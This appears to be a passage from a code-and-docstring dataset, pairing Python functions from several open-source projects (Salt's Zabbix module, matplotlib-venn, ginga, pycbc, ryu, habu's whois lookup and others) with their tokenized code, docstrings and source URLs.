or nodeids parameter to' 'check if at least one host that matches the given filter ' 'criteria exists.'} ret = _query(method, params, conn_args['url'], conn_args['auth']) return ret['result'] else: raise KeyError except KeyError: return ret
[ "def", "host_exists", "(", "host", "=", "None", ",", "hostid", "=", "None", ",", "name", "=", "None", ",", "node", "=", "None", ",", "nodeids", "=", "None", ",", "*", "*", "kwargs", ")", ":", "conn_args", "=", "_login", "(", "*", "*", "kwargs", "...
Checks if at least one host that matches the given filter criteria exists. .. versionadded:: 2016.3.0 :param host: technical name of the host :param hostids: Hosts (hostids) to delete. :param name: visible name of the host :param node: name of the node the hosts must belong to (zabbix API < 2.4) :param nodeids: IDs of the node the hosts must belong to (zabbix API < 2.4) :param _connection_user: Optional - zabbix user (can also be set in opts or pillar, see module's docstring) :param _connection_password: Optional - zabbix password (can also be set in opts or pillar, see module's docstring) :param _connection_url: Optional - url of zabbix frontend (can also be set in opts, pillar, see module's docstring) :return: IDs of the deleted hosts, False on failure. CLI Example: .. code-block:: bash salt '*' zabbix.host_exists 'Zabbix server'
[ "Checks", "if", "at", "least", "one", "host", "that", "matches", "the", "given", "filter", "criteria", "exists", "." ]
python
train
konstantint/matplotlib-venn
matplotlib_venn/_arc.py
https://github.com/konstantint/matplotlib-venn/blob/c26796c9925bdac512edf48387452fbd1848c791/matplotlib_venn/_arc.py#L417-L428
def reversed(self): ''' Returns a copy of this arc, with the direction flipped. >>> Arc((0, 0), 1, 0, 360, True).reversed() Arc([0.000, 0.000], 1.000, 360.000, 0.000, False, degrees=360.000) >>> Arc((0, 0), 1, 175, -175, True).reversed() Arc([0.000, 0.000], 1.000, -175.000, 175.000, False, degrees=10.000) >>> Arc((0, 0), 1, 0, 370, True).reversed() Arc([0.000, 0.000], 1.000, 370.000, 0.000, False, degrees=360.000) ''' return Arc(self.center, self.radius, self.to_angle, self.from_angle, not self.direction)
[ "def", "reversed", "(", "self", ")", ":", "return", "Arc", "(", "self", ".", "center", ",", "self", ".", "radius", ",", "self", ".", "to_angle", ",", "self", ".", "from_angle", ",", "not", "self", ".", "direction", ")" ]
Returns a copy of this arc, with the direction flipped. >>> Arc((0, 0), 1, 0, 360, True).reversed() Arc([0.000, 0.000], 1.000, 360.000, 0.000, False, degrees=360.000) >>> Arc((0, 0), 1, 175, -175, True).reversed() Arc([0.000, 0.000], 1.000, -175.000, 175.000, False, degrees=10.000) >>> Arc((0, 0), 1, 0, 370, True).reversed() Arc([0.000, 0.000], 1.000, 370.000, 0.000, False, degrees=360.000)
[ "Returns", "a", "copy", "of", "this", "arc", "with", "the", "direction", "flipped", ".", ">>>", "Arc", "((", "0", "0", ")", "1", "0", "360", "True", ")", ".", "reversed", "()", "Arc", "(", "[", "0", ".", "000", "0", ".", "000", "]", "1", ".", ...
python
train
ejeschke/ginga
ginga/ImageView.py
https://github.com/ejeschke/ginga/blob/a78c893ec6f37a837de851947e9bb4625c597915/ginga/ImageView.py#L2148-L2157
def set_scale_base_xy(self, scale_x_base, scale_y_base): """Set stretch factors. Parameters ---------- scale_x_base, scale_y_base : float Stretch factors for X and Y, respectively. """ self.t_.set(scale_x_base=scale_x_base, scale_y_base=scale_y_base)
[ "def", "set_scale_base_xy", "(", "self", ",", "scale_x_base", ",", "scale_y_base", ")", ":", "self", ".", "t_", ".", "set", "(", "scale_x_base", "=", "scale_x_base", ",", "scale_y_base", "=", "scale_y_base", ")" ]
Set stretch factors. Parameters ---------- scale_x_base, scale_y_base : float Stretch factors for X and Y, respectively.
[ "Set", "stretch", "factors", "." ]
python
train
gwastro/pycbc
pycbc/inference/io/base_hdf.py
https://github.com/gwastro/pycbc/blob/7a64cdd104d263f1b6ea0b01e6841837d05a4cb3/pycbc/inference/io/base_hdf.py#L787-L809
def write_kwargs_to_attrs(cls, attrs, **kwargs): """Writes the given keywords to the given ``attrs``. If any keyword argument points to a dict, the keyword will point to a list of the dict's keys. Each key is then written to the attrs with its corresponding value. Parameters ---------- attrs : an HDF attrs The ``attrs`` of an hdf file or a group in an hdf file. \**kwargs : The keywords to write. """ for arg, val in kwargs.items(): if val is None: val = str(None) if isinstance(val, dict): attrs[arg] = val.keys() # just call self again with the dict as kwargs cls.write_kwargs_to_attrs(attrs, **val) else: attrs[arg] = val
[ "def", "write_kwargs_to_attrs", "(", "cls", ",", "attrs", ",", "*", "*", "kwargs", ")", ":", "for", "arg", ",", "val", "in", "kwargs", ".", "items", "(", ")", ":", "if", "val", "is", "None", ":", "val", "=", "str", "(", "None", ")", "if", "isinst...
Writes the given keywords to the given ``attrs``. If any keyword argument points to a dict, the keyword will point to a list of the dict's keys. Each key is then written to the attrs with its corresponding value. Parameters ---------- attrs : an HDF attrs The ``attrs`` of an hdf file or a group in an hdf file. \**kwargs : The keywords to write.
[ "Writes", "the", "given", "keywords", "to", "the", "given", "attrs", "." ]
python
train
jeffh/sniffer
sniffer/runner.py
https://github.com/jeffh/sniffer/blob/8e4c3e77743aef08109ea0225b4a6536d4e60270/sniffer/runner.py#L68-L76
def absorb_args(self, func): """ Calls a function without any arguments. The returned caller function accepts any arguments (and throws them away). """ @wraps(func) def wrapper(*args, **kwargs): return func() return wrapper
[ "def", "absorb_args", "(", "self", ",", "func", ")", ":", "@", "wraps", "(", "func", ")", "def", "wrapper", "(", "*", "args", ",", "*", "*", "kwargs", ")", ":", "return", "func", "(", ")", "return", "wrapper" ]
Calls a function without any arguments. The returned caller function accepts any arguments (and throws them away).
[ "Calls", "a", "function", "without", "any", "arguments", ".", "The", "returned", "caller", "function", "accepts", "any", "arguments", "(", "and", "throws", "them", "away", ")", "." ]
python
train
portantier/habu
habu/cli/cmd_whois_ip.py
https://github.com/portantier/habu/blob/87091e389dc6332fe1b82830c22b2eefc55816f2/habu/cli/cmd_whois_ip.py#L12-L36
def cmd_whois_ip(ip): """Simple whois client to check IP addresses (IPv4 and IPv6). Example: \b $ habu.whois.ip 8.8.8.8 { "nir": null, "asn_registry": "arin", "asn": "15169", "asn_cidr": "8.8.8.0/24", "asn_country_code": "US", "asn_date": "1992-12-01", "asn_description": "GOOGLE - Google LLC, US", "query": "8.8.8.8", ... """ warnings.filterwarnings("ignore") obj = IPWhois(ip) data = obj.lookup_rdap() print(json.dumps(data, indent=4))
[ "def", "cmd_whois_ip", "(", "ip", ")", ":", "warnings", ".", "filterwarnings", "(", "\"ignore\"", ")", "obj", "=", "IPWhois", "(", "ip", ")", "data", "=", "obj", ".", "lookup_rdap", "(", ")", "print", "(", "json", ".", "dumps", "(", "data", ",", "ind...
Simple whois client to check IP addresses (IPv4 and IPv6). Example: \b $ habu.whois.ip 8.8.8.8 { "nir": null, "asn_registry": "arin", "asn": "15169", "asn_cidr": "8.8.8.0/24", "asn_country_code": "US", "asn_date": "1992-12-01", "asn_description": "GOOGLE - Google LLC, US", "query": "8.8.8.8", ...
[ "Simple", "whois", "client", "to", "check", "IP", "addresses", "(", "IPv4", "and", "IPv6", ")", "." ]
python
train
osrg/ryu
ryu/lib/lacplib.py
https://github.com/osrg/ryu/blob/6f906e72c92e10bd0264c9b91a2f7bb85b97780c/ryu/lib/lacplib.py#L73-L94
def add(self, dpid, ports): """add a setting of a bonding i/f. 'add' method takes the corresponding args in this order. ========= ===================================================== Attribute Description ========= ===================================================== dpid datapath id. ports a list of integer values that means the ports face with the slave i/fs. ========= ===================================================== if you want to use multi LAG, call 'add' method more than once. """ assert isinstance(ports, list) assert len(ports) >= 2 ifs = {} for port in ports: ifs[port] = {'enabled': False, 'timeout': 0} bond = {dpid: ifs} self._bonds.append(bond)
[ "def", "add", "(", "self", ",", "dpid", ",", "ports", ")", ":", "assert", "isinstance", "(", "ports", ",", "list", ")", "assert", "len", "(", "ports", ")", ">=", "2", "ifs", "=", "{", "}", "for", "port", "in", "ports", ":", "ifs", "[", "port", ...
add a setting of a bonding i/f. 'add' method takes the corresponding args in this order. ========= ===================================================== Attribute Description ========= ===================================================== dpid datapath id. ports a list of integer values that means the ports face with the slave i/fs. ========= ===================================================== if you want to use multi LAG, call 'add' method more than once.
[ "add", "a", "setting", "of", "a", "bonding", "i", "/", "f", ".", "add", "method", "takes", "the", "corresponding", "args", "in", "this", "order", "." ]
python
train
mushkevych/scheduler
process_starter.py
https://github.com/mushkevych/scheduler/blob/6740331360f49083c208085fb5a60ce80ebf418b/process_starter.py#L10-L47
def get_class(kls): """ :param kls - string of fully identified starter function or starter method path for instance: - workers.abstract_worker.AbstractWorker.start - workers.example_script_worker.main :return tuple (type, object, starter) for instance: - (FunctionType, <function_main>, None) - (type, <Class_...>, 'start') """ parts = kls.split('.') try: # First, try to import module hosting starter function module = '.'.join(parts[:-1]) m = __import__(module) except ImportError: # Alternatively, try to import module hosting Class with a starter method module = '.'.join(parts[:-2]) m = __import__(module) t = None starter = None for i in range(1, len(parts)): comp = parts[i] starter = parts[i:] m = getattr(m, comp) if isinstance(m, class_types): t = type starter = None if len(parts[i:]) == 1 else '.'.join(parts[i + 1:]) break if isinstance(m, types.FunctionType): t = types.FunctionType starter = None break return t, m, starter
[ "def", "get_class", "(", "kls", ")", ":", "parts", "=", "kls", ".", "split", "(", "'.'", ")", "try", ":", "# First, try to import module hosting starter function", "module", "=", "'.'", ".", "join", "(", "parts", "[", ":", "-", "1", "]", ")", "m", "=", ...
:param kls - string of fully identified starter function or starter method path for instance: - workers.abstract_worker.AbstractWorker.start - workers.example_script_worker.main :return tuple (type, object, starter) for instance: - (FunctionType, <function_main>, None) - (type, <Class_...>, 'start')
[ ":", "param", "kls", "-", "string", "of", "fully", "identified", "starter", "function", "or", "starter", "method", "path", "for", "instance", ":", "-", "workers", ".", "abstract_worker", ".", "AbstractWorker", ".", "start", "-", "workers", ".", "example_script...
python
train
LionelAuroux/pyrser
pyrser/type_system/scope.py
https://github.com/LionelAuroux/pyrser/blob/f153a97ef2b6bf915a1ed468c0252a9a59b754d5/pyrser/type_system/scope.py#L180-L184
def union(self, sig: Scope) -> Scope: """ Create a new Set produce by the union of 2 Set """ new = Scope(sig=self._hsig.values(), state=self.state) new |= sig return new
[ "def", "union", "(", "self", ",", "sig", ":", "Scope", ")", "->", "Scope", ":", "new", "=", "Scope", "(", "sig", "=", "self", ".", "_hsig", ".", "values", "(", ")", ",", "state", "=", "self", ".", "state", ")", "new", "|=", "sig", "return", "ne...
Create a new Set produce by the union of 2 Set
[ "Create", "a", "new", "Set", "produce", "by", "the", "union", "of", "2", "Set" ]
python
test